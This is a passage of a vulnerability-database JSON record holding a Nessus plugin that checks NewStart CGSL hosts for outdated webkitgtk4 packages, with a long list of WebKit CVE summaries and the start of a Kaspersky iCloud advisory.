12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8518, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8523, CVE-2019-8524)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8535)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8536, CVE-2019-8544)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8551)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-03-10T00:00:00", "type": "nessus", "title": "NewStart CGSL CORE 5.04 / MAIN 5.04 : webkitgtk4 Multiple Vulnerabilities (NS-SA-2021-0041)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8383", "CVE-2019-11070", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-7285", "CVE-2019-7292", "CVE-2019-8503", "CVE-2019-8506", "CVE-2019-8515", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8625", "CVE-2019-8644", "CVE-2019-8649", "CVE-2019-8658", "CVE-2019-8666", "CVE-2019-8669", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8674", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8678", "CVE-2019-8679", "CVE-2019-8680", "CVE-2019-8681", "CVE-2019-8683", "CVE-2019-8684", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8688", "CVE-2019-8689", "CVE-2019-8690", "CVE-2019-8707", "CVE-2019-8710", "CVE-2019-8719", "CVE-2019-8720", "CVE-2019-8726", "CVE-2019-8733", "CVE-2019-8735", "CVE-2019-8743", "CVE-2019-8763", "CVE-2019-8764", "CVE-2019-8765", "CVE-2019-8766", "CVE-2019-8768", "CVE-2019-8769", "CVE-2019-8771", "CVE-2019-8782", "CVE-2019-8783", "CVE-2019-8808", "CVE-2019-8811", "CVE-2019-8812", "CVE-2019-8813", "CVE-2019-8814", "CVE-2019-8815", "CVE-2019-8816", "CVE-2019-8819", "CVE-2019-8820", "CVE-2019-8821", "CVE-2019-8822", "CVE-2019-8823", "CVE-2019-8835", "CVE-2019-8844", "CVE-2019-8846", "CVE-2020-10018", "CVE-2020-11793", "CVE-2020-3862", "CVE-2020-3864", "CVE-2020-3865", "CVE-2020-3867", "CVE-2020-3868", "CVE-2020-3885", "CVE-2020-3894", "CVE-2020-3895", "CVE-2020-3897", "CVE-2020-3899", "CVE-2020-3900", "CVE-2020-3901", "CVE-2020-3902"], "modified": "2022-05-25T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2021-0041_WEBKITGTK4.NASL", "href": "https://www.tenable.com/plugins/nessus/147380", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2021-0041. The text\n# itself is copyright (C) ZTE, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147380);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2019-6237\",\n \"CVE-2019-6251\",\n \"CVE-2019-7285\",\n \"CVE-2019-7292\",\n \"CVE-2019-8503\",\n \"CVE-2019-8506\",\n \"CVE-2019-8515\",\n \"CVE-2019-8518\",\n \"CVE-2019-8523\",\n \"CVE-2019-8524\",\n \"CVE-2019-8535\",\n \"CVE-2019-8536\",\n \"CVE-2019-8544\",\n \"CVE-2019-8551\",\n \"CVE-2019-8558\",\n \"CVE-2019-8559\",\n \"CVE-2019-8563\",\n \"CVE-2019-8571\",\n \"CVE-2019-8583\",\n \"CVE-2019-8584\",\n \"CVE-2019-8586\",\n \"CVE-2019-8587\",\n \"CVE-2019-8594\",\n \"CVE-2019-8595\",\n \"CVE-2019-8596\",\n \"CVE-2019-8597\",\n \"CVE-2019-8601\",\n \"CVE-2019-8607\",\n \"CVE-2019-8608\",\n \"CVE-2019-8609\",\n \"CVE-2019-8610\",\n \"CVE-2019-8611\",\n \"CVE-2019-8615\",\n \"CVE-2019-8619\",\n \"CVE-2019-8622\",\n \"CVE-2019-8623\",\n \"CVE-2019-8625\",\n \"CVE-2019-8644\",\n \"CVE-2019-8649\",\n \"CVE-2019-8658\",\n \"CVE-2019-8666\",\n \"CVE-2019-8669\",\n \"CVE-2019-8671\",\n \"CVE-2019-8672\",\n \"CVE-2019-8673\",\n \"CVE-2019-8674\",\n \"CVE-2019-8676\",\n \"CVE-2019-8677\",\n \"CVE-2019-8678\",\n \"CVE-2019-8679\",\n \"CVE-2019-8680\",\n \"CVE-2019-8681\",\n \"CVE-2019-8683\",\n \"CVE-2019-8684\",\n \"CVE-2019-8686\",\n \"CVE-2019-8687\",\n \"CVE-2019-8688\",\n \"CVE-2019-8689\",\n \"CVE-2019-8690\",\n \"CVE-2019-8707\",\n \"CVE-2019-8710\",\n \"CVE-2019-8719\",\n \"CVE-2019-8720\",\n \"CVE-2019-8726\",\n \"CVE-2019-8733\",\n \"CVE-2019-8735\",\n \"CVE-2019-8743\",\n \"CVE-2019-8763\",\n \"CVE-2019-8764\",\n \"CVE-2019-8765\",\n \"CVE-2019-8766\",\n \"CVE-2019-8768\",\n \"CVE-2019-8769\",\n \"CVE-2019-8771\",\n \"CVE-2019-8782\",\n \"CVE-2019-8783\",\n \"CVE-2019-8808\",\n \"CVE-2019-8811\",\n \"CVE-2019-8812\",\n \"CVE-2019-8813\",\n \"CVE-2019-8814\",\n \"CVE-2019-8815\",\n \"CVE-2019-8816\",\n \"CVE-2019-8819\",\n \"CVE-2019-8820\",\n \"CVE-2019-8821\",\n \"CVE-2019-8822\",\n \"CVE-2019-8823\",\n \"CVE-2019-8835\",\n \"CVE-2019-8844\",\n \"CVE-2019-8846\",\n \"CVE-2019-11070\",\n \"CVE-2020-3862\",\n \"CVE-2020-3864\",\n \"CVE-2020-3865\",\n \"CVE-2020-3867\",\n \"CVE-2020-3868\",\n \"CVE-2020-3885\",\n \"CVE-2020-3894\",\n \"CVE-2020-3895\",\n \"CVE-2020-3897\",\n \"CVE-2020-3899\",\n \"CVE-2020-3900\",\n \"CVE-2020-3901\",\n \"CVE-2020-3902\",\n \"CVE-2020-10018\",\n \"CVE-2020-11793\"\n );\n script_bugtraq_id(\n 108497,\n 108566,\n 109328,\n 109329\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n\n script_name(english:\"NewStart CGSL CORE 5.04 / MAIN 5.04 : webkitgtk4 Multiple Vulnerabilities (NS-SA-2021-0041)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has webkitgtk4 packages installed that are\naffected by multiple vulnerabilities:\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n tvOS 13.3, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows,\n iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8835)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 12.2,\n tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2019-7285)\n\n - A validation issue was addressed with improved logic. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS\n 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web\n content may result in the disclosure of process memory. (CVE-2019-7292)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari\n 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. A malicious website may be able to execute\n scripts in the context of another website. (CVE-2019-8503)\n\n - A cross-origin issue existed with the fetch API. This was addressed with improved input validation. This\n issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11.\n Processing maliciously crafted web content may disclose sensitive user information. (CVE-2019-8515)\n\n - WebKitGTK through 2.26.4 and WPE WebKit through 2.26.4 (which are the versions right before 2.28.0)\n contains a memory corruption issue (use-after-free) that may lead to arbitrary code execution. This issue\n has been fixed in 2.28.0 with improved memory handling. (CVE-2020-10018)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 13.3,\n iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for\n Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8846)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n tvOS 13.3, watchOS 6.1.1, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3\n for Windows, iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2019-8844)\n\n - A use-after-free issue exists in WebKitGTK before 2.28.1 and WPE WebKit before 2.28.1 via crafted web\n content that allows remote attackers to execute arbitrary code or cause a denial of service (memory\n corruption and application crash). (CVE-2020-11793)\n\n - A denial of service issue was addressed with improved memory handling. This issue is fixed in iOS 13.3.1\n and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud\n for Windows 7.17. A malicious website may be able to cause a denial of service. (CVE-2020-3862)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0,\n iCloud for Windows 7.17. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3865, CVE-2020-3868)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8710)\n\n - A logic issue was addressed with improved state management. This issue is fixed in tvOS 13, iTunes for\n Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web\n content may lead to universal cross site scripting. (CVE-2019-8625, CVE-2019-8719)\n\n - A logic issue existed in the handling of synchronous page loads. This issue was addressed with improved\n state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes\n for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web\n content may lead to universal cross site scripting. (CVE-2019-8649)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave\n 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud\n for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting.\n (CVE-2019-8658)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for\n Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2019-8669, CVE-2019-8672, CVE-2019-8676, CVE-2019-8683, CVE-2019-8688, CVE-2019-8689)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13,\n iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8666, CVE-2019-8671, CVE-2019-8673, CVE-2019-8677, CVE-2019-8678, CVE-2019-8679, CVE-2019-8680,\n CVE-2019-8681, CVE-2019-8686, CVE-2019-8687)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-6237,\n CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8609,\n CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 are vulnerable to address bar spoofing upon certain\n JavaScript redirections. An attacker could cause malicious web content to be displayed as if for a trusted\n URI. This is similar to the CVE-2018-8383 issue in Microsoft Edge. (CVE-2019-6251)\n\n - A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4,\n tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A\n file URL may be incorrectly processed. (CVE-2020-3885)\n\n - A race condition was addressed with additional validation. This issue is fixed in iOS 13.4 and iPadOS\n 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows\n 7.18. An application may be able to read restricted memory. (CVE-2020-3894)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and\n iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3,\n iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3895, CVE-2020-3900)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and\n iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3,\n iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution. (CVE-2020-3897)\n\n - A memory consumption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4\n and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows\n 10.9.3, iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution.\n (CVE-2020-3899)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and\n iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3,\n iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3901)\n\n - An input validation issue was addressed with improved input validation. This issue is fixed in iOS 13.4\n and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for\n Windows 7.18. Processing maliciously crafted web content may lead to a cross site scripting attack.\n (CVE-2020-3902)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iCloud for Windows 7.17,\n iTunes 12.10.4 for Windows, iCloud for Windows 10.9.2, tvOS 13.3.1, Safari 13.0.5, iOS 13.3.1 and iPadOS\n 13.3.1. A DOM object context may not have had a unique security origin. (CVE-2020-3864)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13.3.1 and iPadOS\n 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for\n Windows 7.17. Processing maliciously crafted web content may lead to universal cross site scripting.\n (CVE-2020-3867)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n watchOS 6.1. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8743, CVE-2019-8765)\n\n - A logic issue was addressed with improved state management. This issue is fixed in watchOS 6.1. Processing\n maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8764)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n watchOS 6.1, iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2019-8766)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8782)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0,\n iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8783, CVE-2019-8814, CVE-2019-8815, CVE-2019-8819, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8808, CVE-2019-8812)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for\n Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2019-8811, CVE-2019-8816, CVE-2019-8820)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13.2 and iPadOS\n 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0. Processing\n maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8813)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13, Safari 13.\n Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8674)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8707, CVE-2019-8726,\n CVE-2019-8733, CVE-2019-8735)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.1 and iPadOS 13.1, tvOS 13, Safari 13.0.1, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud\n for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8763)\n\n - An issue existed in the drawing of web page elements. The issue was addressed with improved logic. This\n issue is fixed in iOS 13.1 and iPadOS 13.1, macOS Catalina 10.15. Visiting a maliciously crafted website\n may reveal browsing history. (CVE-2019-8769)\n\n - This issue was addressed with improved iframe sandbox enforcement. This issue is fixed in Safari 13.0.1,\n iOS 13. Maliciously crafted web content may violate iframe sandboxing policy. (CVE-2019-8771)\n\n - Clear History and Website Data did not clear the history. The issue was addressed with improved data\n deletion. This issue is fixed in macOS Catalina 10.15. A user may be unable to delete browsing history\n items. (CVE-2019-8768)\n\n - A logic issue existed in the handling of document loads. This issue was addressed with improved state\n management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for\n Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web\n content may lead to universal cross site scripting. (CVE-2019-8690)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for\n Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8583, CVE-2019-8601, CVE-2019-8622, CVE-2019-8623)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 failed to properly apply configured HTTP proxy settings\n when downloading livestream video (HLS, DASH, or Smooth Streaming), an error resulting in deanonymization.\n This issue was corrected by changing the way livestreams are downloaded. (CVE-2019-11070)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS\n 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously\n crafted web content may lead to arbitrary code execution. (CVE-2019-8506)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8518, CVE-2019-8558,\n CVE-2019-8559, CVE-2019-8563)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously\n crafted web content may lead to arbitrary code execution. (CVE-2019-8523, CVE-2019-8524)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.2,\n tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2019-8535)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 12.2,\n tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8536, CVE-2019-8544)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari\n 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may\n lead to universal cross site scripting. (CVE-2019-8551)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2021-0041\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL webkitgtk4 packages. Note that updated packages may not be available yet. Please contact ZTE\nfor more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3899\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-10018\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/ZTE-CGSL/release');\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, 'NewStart Carrier Grade Server Linux');\n\nif (release !~ \"CGSL CORE 5.04\" &&\n release !~ \"CGSL MAIN 5.04\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL CORE 5.04 / NewStart CGSL MAIN 5.04');\n\nif (!get_kb_item('Host/ZTE-CGSL/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'NewStart Carrier Grade Server Linux', cpu);\n\nflag = 0;\n\npkgs = {\n 'CGSL CORE 5.04': [\n 'webkitgtk4-2.28.2-2.el7',\n 'webkitgtk4-devel-2.28.2-2.el7',\n 'webkitgtk4-doc-2.28.2-2.el7',\n 'webkitgtk4-jsc-2.28.2-2.el7',\n 'webkitgtk4-jsc-devel-2.28.2-2.el7'\n ],\n 'CGSL MAIN 5.04': [\n 'webkitgtk4-2.28.2-2.el7',\n 'webkitgtk4-devel-2.28.2-2.el7',\n 'webkitgtk4-doc-2.28.2-2.el7',\n 'webkitgtk4-jsc-2.28.2-2.el7',\n 'webkitgtk4-jsc-devel-2.28.2-2.el7'\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:'ZTE ' + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkitgtk4');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2023-12-03T19:30:13", "description": "### *Detect date*:\n05/28/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in iCloud. Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges.\n\n### *Affected products*:\nICloud version 7.12\n\n### *Solution*:\nUpdate to the latest version \n[Download iCloud](<https://support.apple.com/en-us/HT204283>)\n\n### *Original advisories*:\n[HT210125](<https://support.apple.com/en-us/HT210125>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apple iCloud](<https://threats.kaspersky.com/en/product/Apple-iCloud/>)\n\n### *CVE-IDS*:\n[CVE-2019-8601](<https://vulners.com/cve/CVE-2019-8601>)6.8High \n[CVE-2019-8628](<https://vulners.com/cve/CVE-2019-8628>)6.8High \n[CVE-2019-8597](<https://vulners.com/cve/CVE-2019-8597>)4.3Warning \n[CVE-2019-8610](<https://vulners.com/cve/CVE-2019-8610>)6.8High \n[CVE-2019-8622](<https://vulners.com/cve/CVE-2019-8622>)6.8High \n[CVE-2019-8607](<https://vulners.com/cve/CVE-2019-8607>)4.3Warning \n[CVE-2019-8571](<https://vulners.com/cve/CVE-2019-8571>)6.8High \n[CVE-2019-8586](<https://vulners.com/cve/CVE-2019-8586>)6.8High \n[CVE-2019-8583](<https://vulners.com/cve/CVE-2019-8583>)6.8High \n[CVE-2019-8611](<https://vulners.com/cve/CVE-2019-8611>)6.8High \n[CVE-2019-8615](<https://vulners.com/cve/CVE-2019-8615>)4.3Warning \n[CVE-2019-8594](<https://vulners.com/cve/CVE-2019-8594>)6.8High \n[CVE-2019-8595](<https://vulners.com/cve/CVE-2019-8595>)6.8High \n[CVE-2019-8584](<https://vulners.com/cve/CVE-2019-8584>)6.8High \n[CVE-2019-6237](<https://vulners.com/cve/CVE-2019-6237>)6.8High \n[CVE-2019-8577](<https://vulners.com/cve/CVE-2019-8577>)6.8High \n[CVE-2019-8600](<https://vulners.com/cve/CVE-2019-8600>)7.5Critical \n[CVE-2019-8623](<https://vulners.com/cve/CVE-2019-8623>)6.8High \n[CVE-2019-8598](<https://vulners.com/cve/CVE-2019-8598>)4.3Warning \n[CVE-2019-8608](<https://vulners.com/cve/CVE-2019-8608>)6.8High \n[CVE-2019-8619](<https://vulners.com/cve/CVE-2019-8619>)6.8High \n[CVE-2019-8602](<https://vulners.com/cve/CVE-2019-8602>)6.8High \n[CVE-2019-8587](<https://vulners.com/cve/CVE-2019-8587>)6.8High \n[CVE-2019-8596](<https://vulners.com/cve/CVE-2019-8596>)6.8High \n[CVE-2019-8609](<https://vulners.com/cve/CVE-2019-8609>)6.8High 